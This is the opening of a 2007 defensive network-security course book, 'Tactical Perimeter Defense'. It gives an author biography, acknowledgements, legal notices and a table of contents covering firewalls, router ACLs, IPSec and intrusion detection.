You are on page 1of 592

Tactical Perimeter Defense

Warren Peterson
Warren Peterson is the President of
Security Certied Program, LLC
and the founder of the Security
Certied Program. Mr. Peterson
regularly delivers standing-room
only security presentations for
government and corporate clients
on subjects ranging from general
security to the threats of Cyber
terrorism. Mr. Peterson is an
accomplished and experienced
teacher who holds many industry
certications. His training methods
have earned him the utmost respect
and recognition from both his
students and his peers. Even many
years after courses have ended,
many of Mr. Petersons students
from around the world stay in
touch with him.
Mr. Peterson has developed
instructional curriculum for
customized courses, such as
courses for Microsoft, Cisco,
CompTIA, and various security
programs. In addition to writing for
magazines, such as Certication
Magazine, he is the lead author for
the Security Certied Program
courses, including: Network
Security Fundamentals, Hardening
the Infrastructure, Network
Defense and Countermeasures,
Tactical Perimeter Defense,
Strategic Infrastructure Security,
Advanced Security Implementation,
and Enterprise Security Solutions.
Mr. Peterson includes the following
personal thanks:
Thank you to my wife, Carin, you
and our girls give me constant
support, and I thank you for your
devotion. You remind me daily
why teaching is so important. I
love you deeply, and look forward
to seeing you again now that this
writing phase is over!
Thank you to Waleed, you have
been the foundation behind more
positive change than I can describe,
knowing you and working with
you has been a true pleasure.
Thanks to Gene, for your trusted
advice and mentoring; to Mark, for
your passion and enthusiasm (go
have another coffee!); to Tracy, for
your loyalty and friendship, which
are unmatched; to Joe, for your
professionalism, and desire for the
best; to Dave, for always being
there, even early in the morning.
And, thanks to Charles, Shrinath,
and Robert, time has moved us
apart, but you have each made an
impression on me, and I thank you
for that.
TACTICAL PERIMETER DEFENSE
For software version: N/A
ACKNOWLEDGEMENTS
Project Team
Curriculum and Technical Writers: Warren Peterson and Clay Scott Copy Editor: Carin Peterson
Reviewing Editor: Sandy Castle-Rhoads Technical Editor: Tracy Richter Quality Assurance Analyst:
David Young Graphic Designer: Mark Patrick
Project Support
Development Assistance: Ben Tchoubineh
NOTICES
DISCLAIMER: While Security Certied Program LLC takes care to ensure the accuracy and quality of these materials, we cannot guarantee their accuracy, and all materials
are provided without any warranty whatsoever, including, but not limited to, the implied warranties of merchantability or tness for a particular purpose. Any name used in the
data les for this course is that of a ctitious company. Any resemblance to current or future companies is purely coincidental. We do not believe we have used anyones
name in creating this course, but if we have, please notify us and we will change the name in the next revision of the course. Security Certied Program LLC is an
independent developer of courseware and certication programs for individuals, businesses, educational institutions, and government agencies. Use of screenshots,
photographs of another entitys products, or another entitys product name or service in this book is for editorial purposes only. No such use should be construed to imply
sponsorship or endorsement of the book by, nor any afliation of such entity with Security Certied Program LLC. This courseware may contain links to sites on the Internet
that are owned and operated by third parties (the External Sites). Security Certied Program LLC is not responsible for the availability of, or the content located on or
through, any External Site. Please contact Security Certied Program LLC if you have any concerns regarding such links or External Sites.
TRADEMARK NOTICES: The Security Certied Program, SCP, SCNS, SCNP, and SCNA are trademarks of The Security Certied Program, LLC in the U.S. and other
countries; The Security Certied Program, SCP, SCNS, SCNP, products and services discussed or described may be trademarks of The Security Certied Program, LLC. All
other product names and services used throughout this book may be common law or registered trademarks of their respective proprietors.
Copyright 2007 Security Certied Program, LLC. All rights reserved. Screenshots used for illustrative purposes are the property of the software proprietor. This publication
or any part thereof, may not be reproduced or transmitted in any form or by any means, electronic or mechanical, including photocopying, recording, storage in an
information retrieval system, or otherwise, without express written permission of Security Certied Program LLC, 825 West State Street, Suite 204, Geneva, Illinois 60134,
USA. (630) 208-5030. Security Certied Program LLCs World Wide Web site is located at: www.SecurityCertied.Net.
This book conveys no rights in the software or other products about which it was written; all use or licensing of such software or other products is the responsibility of the
user according to terms and conditions of the owner. Do not make illegal copies of books or software. If you believe that this book, related materials, or any other Security
Certied Program LLC materials are being reproduced or transmitted without permission, please call 1-630-208-5030.
ii Tactical Perimeter Defense
Course Edition: 2.0
Course Number: SCPTPD20
TACTICAL PERIMETER DEFENSE
About This Course . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . xvii
Lesson 1: Network Defense Fundamentals . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1
Lesson 2: Advanced TCP/IP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 31
Lesson 3: Routers and Access Control Lists . . . . . . . . . . . . . . . . . . . . . . . . . . . . 95
Lesson 4: Designing Firewalls . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 155
Lesson 5: Conguring Firewalls . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 189
Lesson 6: Implementing IPSec and VPNs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 299
Lesson 7: Designing an Intrusion Detection System . . . . . . . . . . . . . . . . . . . . . . . 369
Lesson 8: Conguring an IDS. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 403
Lesson 9: Securing Wireless Networks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 447
Glossary. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 537
Index . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 543
CONTENT
OVERVIEW
Contents iii
TACTICAL PERIMETER DEFENSE
CONTENTS
About This Course . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . xvii
Course Setup Information . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . xxii
How To Use This Book. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . xl
LESSON 1: NETWORK DEFENSE FUNDAMENTALS
Topic 1A Network Defense. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2
Five Key Issues of Network Security . . . . . . . . . . . . . . . . . . . . . . . . . . . 3
The Threats to Security . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5
Defensive Strategies . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6
Defensive Strategy Requirements . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8
Task 1A-1 Identifying Non-repudiation Issues . . . . . . . . . . . . . . . . . . . 10
Topic 1B Defensive Technologies . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 10
The Castle Analogy . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 10
Attacking the Castle . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 11
The Castles Firewall . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 11
The Castles Intrusion Detection. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 12
The Castles Back Doors. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 12
The Defense Technologies . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13
Task 1B-1 Describing the Layers of a Defended Network . . . . . . . . . . . . 14
Topic 1C Objectives of Access Control . . . . . . . . . . . . . . . . . . . . . . . . . . 15
Access Control . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 15
Authentication . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 16
Authentication Tokens. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 16
Task 1C-1 Describing the Challenge Response Token Process . . . . . . . . . 20
Topic 1D The Impact of Defense . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 21
Firewalls . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 21
Encryption . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 21
Passwords . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 22
Intrusion Detection Systems. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 22
Auditing. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 22
Task 1D-1 Describing the Problems of Additional Layers of Security. . . . . 23
Topic 1E Network Auditing Concepts . . . . . . . . . . . . . . . . . . . . . . . . . . . 23
Security Auditing Basics . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 23
CONTENTS
iv Tactical Perimeter Defense
Security Audits . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 24
Audit Trails . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 25
Handling and Preserving Audit Data. . . . . . . . . . . . . . . . . . . . . . . . . . . 25
Legal Considerations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 25
Task 1E-1 Describing Network Auditing . . . . . . . . . . . . . . . . . . . . . . . 26
Lesson Review 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 27
LESSON 2: ADVANCED TCP/IP
Topic 2A TCP/IP Concepts . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 33
RFCs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 36
The Function of IP. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 36
The Subnet Mask . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 40
Task 2A-1 Layering and Address Conversions . . . . . . . . . . . . . . . . . . . . 42
Routing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 42
VLSM and CIDR . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 43
X-casting . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 44
Task 2A-2 Routers and Subnetting. . . . . . . . . . . . . . . . . . . . . . . . . . . 44
Topic 2B Analyzing the Three-way Handshake . . . . . . . . . . . . . . . . . . . 46
Connections. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 48
Ports . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 50
Network Monitor . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 52
Task 2B-1 Using Network Monitor . . . . . . . . . . . . . . . . . . . . . . . . . . . 57
Wireshark. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 58
Task 2B-2 Installing and Starting Wireshark . . . . . . . . . . . . . . . . . . . . 58
Wireshark Overview . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 59
Task 2B-3 Using Wireshark . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 62
TCP Connections . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 63
Task 2B-4 Analyzing the Three-way Handshake . . . . . . . . . . . . . . . . . . 63
The Session Teardown Process . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 64
Task 2B-5 Analyzing the Session Teardown Process. . . . . . . . . . . . . . . . 65
Topic 2C Capturing and Identifying IP Datagrams . . . . . . . . . . . . . . . . 65
Task 2C-1 Capturing and Identifying IP Datagrams. . . . . . . . . . . . . . . . 67
Topic 2D Capturing and Identifying ICMP Messages. . . . . . . . . . . . . . . 68
Task 2D-1 Capturing and Identifying ICMP Messages. . . . . . . . . . . . . . . 69
Topic 2E Capturing and Identifying TCP Headers . . . . . . . . . . . . . . . . . 70
Task 2E-1 Capturing and Identifying TCP Headers. . . . . . . . . . . . . . . . . 72
Topic 2F Capturing and Identifying UDP Headers . . . . . . . . . . . . . . . . 73
Task 2F-1 Working with UDP Headers. . . . . . . . . . . . . . . . . . . . . . . . . 73
Topic 2G Analyzing Packet Fragmentation. . . . . . . . . . . . . . . . . . . . . . . 74
Task 2G-1 Analyzing Fragmentation. . . . . . . . . . . . . . . . . . . . . . . . . . 75
CONTENTS
Contents v
Topic 2H Analyzing an Entire Session . . . . . . . . . . . . . . . . . . . . . . . . . . 76
Task 2H-1 Performing a Complete ICMP Session Analysis . . . . . . . . . . . . 76
Continuing the Complete Session Analysis. . . . . . . . . . . . . . . . . . . . . . 79
Task 2H-2 Performing a Complete FTP Session Analysis . . . . . . . . . . . . . 80
Lesson Review 2 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 92
LESSON 3: ROUTERS AND ACCESS CONTROL LISTS
Topic 3A Fundamental Cisco Security. . . . . . . . . . . . . . . . . . . . . . . . . . . 96
Authentication and Authorization . . . . . . . . . . . . . . . . . . . . . . . . . . . . 98
Configuring Access Passwords. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 99
Task 3A-1 Configuring Passwords . . . . . . . . . . . . . . . . . . . . . . . . . . . 100
Creating User Accounts . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 100
Implementing Banners . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 101
Implementing Cisco Banners . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 101
Task 3A-2 Configuring Login Banners. . . . . . . . . . . . . . . . . . . . . . . . . 103
SSH Overview. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 103
Router Configuration to use SSH . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 103
Task 3A-3 Configuring SSH on a Router . . . . . . . . . . . . . . . . . . . . . . . 105
Task 3A-4 Configuring the SSH Client. . . . . . . . . . . . . . . . . . . . . . . . . 107
Topic 3B Routing Principles . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .108
The ARP Process . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 108
LAN-to-LAN Routing Process . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 110
LAN-to-WAN Routing Process . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 112
Task 3B-1 Performing IP and MAC Analysis . . . . . . . . . . . . . . . . . . . . . 113
The Routing Process . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 114
Static and Dynamic Routing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 116
Comparing Routed Protocols and Routing Protocols . . . . . . . . . . . . . . 119
The Routing Protocols. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 120
RIP. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 124
Task 3B-2 Viewing a RIP Capture. . . . . . . . . . . . . . . . . . . . . . . . . . . . 125
RIPv2. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 125
Task 3B-3 Viewing a RIPv2 Capture . . . . . . . . . . . . . . . . . . . . . . . . . . 127
Topic 3C Removing Protocols and Services . . . . . . . . . . . . . . . . . . . . . .128
CDP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 128
Task 3C-1 Turning Off CDP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 129
ICMP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 129
Task 3C-2 Hardening ICMP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 130
Source Routing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 130
Small Services . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 131
Finger . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 131
Remaining Services . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 132
Task 3C-3 Removing Unneeded Services . . . . . . . . . . . . . . . . . . . . . . . 133
AutoSecure . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 133
CONTENTS
vi Tactical Perimeter Defense
Topic 3D Creating Access Control Lists . . . . . . . . . . . . . . . . . . . . . . . . .134
Access Control List Operation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 135
The Access List Process. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 135
The Wildcard Mask. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 136
Task 3D-1 Creating Wildcard Masks . . . . . . . . . . . . . . . . . . . . . . . . . . 138
Topic 3E Implementing Access Control Lists . . . . . . . . . . . . . . . . . . . .138
Defending Against Attacks with ACLs. . . . . . . . . . . . . . . . . . . . . . . . . . 142
Task 3E-1 Creating Access Control Lists . . . . . . . . . . . . . . . . . . . . . . . 144
Context-based Access Control . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 144
Topic 3F Logging Concepts . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .145
Configuring Logging . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 147
Task 3F-1 Configuring Buffered Logging. . . . . . . . . . . . . . . . . . . . . . . 149
ACL Logging . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 149
Task 3F-2 Configuring Anti-spoofing Logging . . . . . . . . . . . . . . . . . . . 151
Lesson Review 3 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 152
LESSON 4: DESIGNING FIREWALLS
Topic 4A Firewall Components . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .156
Firewall Methodologies . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 157
What a Firewall Cannot Do . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 158
Implementation Options for Firewalls. . . . . . . . . . . . . . . . . . . . . . . . . . 158
Task 4A-1 Firewall Planning . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 162
Topic 4B Create a Firewall Policy . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .163
Task 4B-1 Creating a Simple Firewall Policy. . . . . . . . . . . . . . . . . . . . . 167
Topic 4C Rule Sets and Packet Filters . . . . . . . . . . . . . . . . . . . . . . . . . .168
Stateless and Stateful Packet Inspection . . . . . . . . . . . . . . . . . . . . . . . 172
How Attackers Get Around Packet Filters . . . . . . . . . . . . . . . . . . . . . . . 175
Task 4C-1 Firewall Rule Creation . . . . . . . . . . . . . . . . . . . . . . . . . . . . 175
Topic 4D Proxy Server. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .176
Proxy Process. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 177
Proxy Benefits . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 178
Proxy Problems . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 178
Task 4D-1 Diagram the Proxy Process . . . . . . . . . . . . . . . . . . . . . . . . . 179
Topic 4E The Bastion Host. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .180
An Attack on the Bastion Host . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 181
Task 4E-1 Describing a Bastion Host . . . . . . . . . . . . . . . . . . . . . . . . . 182
Topic 4F The Honeypot . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .182
What is a Honeypot?. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 182
Goals of the Honeypot . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 183
CONTENTS
Contents vii
Legal Issues. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 184
Task 4F-1 Honeypot Configuration . . . . . . . . . . . . . . . . . . . . . . . . . . 184
Lesson Review 4 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 185
LESSON 5: CONFIGURING FIREWALLS
Topic 5A Understanding Firewalls. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .190
Address, Port, Protocol, and Services: The Building Blocks of Firewall
Rules . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 193
Examining the Common Types of Firewalls . . . . . . . . . . . . . . . . . . . . . . 196
Building Firewall Rules to Control Network Communications. . . . . . . . 201
Common Firewall Topologies . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 203
Why Would I Want a Firewall on My Network? . . . . . . . . . . . . . . . . . . . 205
What Can a Firewall Not Protect You From? . . . . . . . . . . . . . . . . . . . . . 206
Things to Consider About Firewall Implementation . . . . . . . . . . . . . . . 207
Topic 5B Configuring Microsoft ISA Server 2006 . . . . . . . . . . . . . . . . .210
Introduction to ISA Server 2006. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 210
Task 5B-1 Preparing for the ISA Server 2006 . . . . . . . . . . . . . . . . . . . . 212
ISA Server Installation Requirements . . . . . . . . . . . . . . . . . . . . . . . . . . 214
Task 5B-2 Install Microsoft ISA Server 2006 . . . . . . . . . . . . . . . . . . . . 215
Configuring ISA Server 2006. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 217
Task 5B-3 Exploring the Microsoft ISA Server 2006 Interface . . . . . . . . . 218
Exporting/Importing ISA Server 2006 Configurations as XML Files . . . 223
Task 5B-4 Exporting the Default Configuration . . . . . . . . . . . . . . . . . . 223
ISA Server 2006 Firewall Policies . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 224
Task 5B-5 Creating a Basic Access Rule . . . . . . . . . . . . . . . . . . . . . . . 226
ISA Server 2006 Access Rule Elements . . . . . . . . . . . . . . . . . . . . . . . . . 230
Task 5B-6 Creating a Protocol Rule Element . . . . . . . . . . . . . . . . . . . . 231
Task 5B-7 Creating a User Rule Element . . . . . . . . . . . . . . . . . . . . . . . 233
Content Types . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 234
Task 5B-8 Creating a Content Group Rule Element . . . . . . . . . . . . . . . . 234
ISA Server 2006 Scheduling . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 236
Task 5B-9 Creating and Modifying Schedule Rule Elements. . . . . . . . . . . 236
Using Content Types and Schedules in Rules . . . . . . . . . . . . . . . . . . . . 237
Task 5B-10 Using Content Types and Schedules in Rules . . . . . . . . . . . . . 237
ISA Server 2006 Network Rule Elements. . . . . . . . . . . . . . . . . . . . . . . . 239
Task 5B-11 Creating a Network Rule Element . . . . . . . . . . . . . . . . . . . . 240
ISA Server Publishing Rules . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 242
Task 5B-12 Configuring a Web Publishing Rule . . . . . . . . . . . . . . . . . . . 242
ISA Server 2006 Caching. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 245
Task 5B-13 Enabling and Configuring Caching. . . . . . . . . . . . . . . . . . . . 245
Configuring ISA Server 2006 Network Templates . . . . . . . . . . . . . . . . . 249
Task 5B-14 Install Second Microsoft Loop Back Adapter and Assign an IP
Address . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 249
Task 5B-15 Configure ISA Server 2006 in a Three-legged DMZ . . . . . . . . . 251
CONTENTS
viii Tactical Perimeter Defense
Configuring ISA Server Monitoring . . . . . . . . . . . . . . . . . . . . . . . . . . . . 253
Task 5B-16 Working with Alerts . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 254
Task 5B-17 Working with Reports . . . . . . . . . . . . . . . . . . . . . . . . . . . . 257
ISA Server 2006 Logging. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 260
Task 5B-18 Configuring Logging Options . . . . . . . . . . . . . . . . . . . . . . . 262
Additional Configuration Options for ISA Server 2006. . . . . . . . . . . . . 265
Task 5B-19 Securing ISA Server 2006 with the Security Configuration
Wizard . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 266
Packet Prioritization . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 268
Task 5B-20 Configuring Packet Prioritization. . . . . . . . . . . . . . . . . . . . . 268
Uninstalling ISA Server 2006 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 269
Task 5B-21 Uninstalling ISA Server 2006 . . . . . . . . . . . . . . . . . . . . . . . 270
Topic 5C IPTables Concepts . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .271
Firewalling in Linux. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 271
The Flow of the Chains . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 275
Configuration Options . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 277
The iptables Command . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 277
Chain Management . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 278
Rule Management . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 279
Rule Creation. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 279
Other Options . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 280
Rule Examples . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 281
Creating a Chain . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 282
Deleting a Chain . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 282
Flushing a Chain . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 282
Checking for Connections . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 282
Negating Values. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 283
Defining a Target. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 284
Complex Rules . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 284
Configuring Masquerading. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 284
Case Study . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 285
Task 5C-1 Working with Chain Management . . . . . . . . . . . . . . . . . . . . 288
Topic 5D Implementing Firewall Technologies . . . . . . . . . . . . . . . . . . .290
Lesson Review 5 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 296
LESSON 6: IMPLEMENTING IPSEC AND VPNS
Topic 6A Internet Protocol Security . . . . . . . . . . . . . . . . . . . . . . . . . . . .301
Modes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 302
IPSec Implementation. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 303
Task 6A-1 Describing the Need for IPSec . . . . . . . . . . . . . . . . . . . . . . 304
Topic 6B IPSec Policy Management. . . . . . . . . . . . . . . . . . . . . . . . . . . . .304
The MMC . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 304
CONTENTS
Contents ix
Task 6B-1 Examining the MMC . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 305
IPSec Policies . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 306
Task 6B-2 Identifying Default IPSec Security Policies . . . . . . . . . . . . . . 306
Saving the Customized MMC Configuration . . . . . . . . . . . . . . . . . . . . . 307
Task 6B-3 Saving a Customized MMC . . . . . . . . . . . . . . . . . . . . . . . . . 307
The Secure Server (Require Security) Policy . . . . . . . . . . . . . . . . . . . . . 307
Task 6B-4 Examining Security Methods. . . . . . . . . . . . . . . . . . . . . . . . 308
The Rules Tab for the Secure Server (Require Security) Policy. . . . . . . 309
Task 6B-5 Examining Policy Rules . . . . . . . . . . . . . . . . . . . . . . . . . . . 311
Topic 6C IPSec AH Implementation . . . . . . . . . . . . . . . . . . . . . . . . . . . .312
Creating Custom IPSec Policies. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 312
Task 6C-1 Creating the 1_REQUEST_AH(md5)_only Policy . . . . . . . . . . . 315
Editing Authentication Method Policies . . . . . . . . . . . . . . . . . . . . . . . . 317
Task 6C-2 Editing the 1_REQUEST_AH(md5)_only Policy . . . . . . . . . . . . 318
Setting Up the Computers Response . . . . . . . . . . . . . . . . . . . . . . . . . . 318
Task 6C-3 Configuring the Policy Response . . . . . . . . . . . . . . . . . . . . . 320
Configuring AH in Both Directions . . . . . . . . . . . . . . . . . . . . . . . . . . . . 321
Task 6C-4 Configuring the Second Computer . . . . . . . . . . . . . . . . . . . . 321
Configuring FTP. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 322
Task 6C-5 Setting Up the FTP Process . . . . . . . . . . . . . . . . . . . . . . . . 322
Implementing the IPSec Policy. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 323
Task 6C-6 Implementing the 1_REQUEST_AH(md5)_only Policy. . . . . . . . 324
Request-only Session Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 324
Task 6C-7 Analyzing the Request-only Session. . . . . . . . . . . . . . . . . . . 325
Implementing a Request-and-Respond Policy . . . . . . . . . . . . . . . . . . . 325
Task 6C-8 Configuring a Request-and-Respond IPSec Session. . . . . . . . . 325
Request-and-Respond Session Analysis . . . . . . . . . . . . . . . . . . . . . . . . 326
Task 6C-9 Analyzing the Request-and-Respond Session. . . . . . . . . . . . . 326
Topic 6D Combining AH and ESP in IPSec . . . . . . . . . . . . . . . . . . . . . . .327
Task 6D-1 Creating the 5_REQUEST_AH(md5)+ESP(des) IPSec Policy and
the Response Policy . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 327
